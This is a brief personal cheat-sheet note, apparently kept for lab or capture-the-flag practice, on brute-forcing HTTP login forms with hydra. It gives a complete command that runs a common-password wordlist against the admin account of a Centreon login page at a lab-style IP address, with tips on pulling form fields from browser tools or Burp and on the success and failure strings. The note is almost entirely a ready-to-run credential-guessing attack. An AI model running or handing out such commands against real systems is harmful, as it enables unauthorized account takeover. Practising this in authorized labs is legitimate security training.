HTTP-Auth-Forms
hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/500-worst-passwords.txt 10.10.10.157 http-post-form "/centreon/index.php:useralias=^USER^&password=^PASS^&submitLogin=Connect:Your credentials are incorrect" -FV
- Get the http-post-form stuff from dev tools, burp, or zap
- :S=logout is what to look for on the page if your login succeeds. You can also do just "...:login failed", if your form returns you to a page with the message login failed on it.
- -V is verboose, and -F is stop when a good password is found
hydra -U http-form-post
For other examples!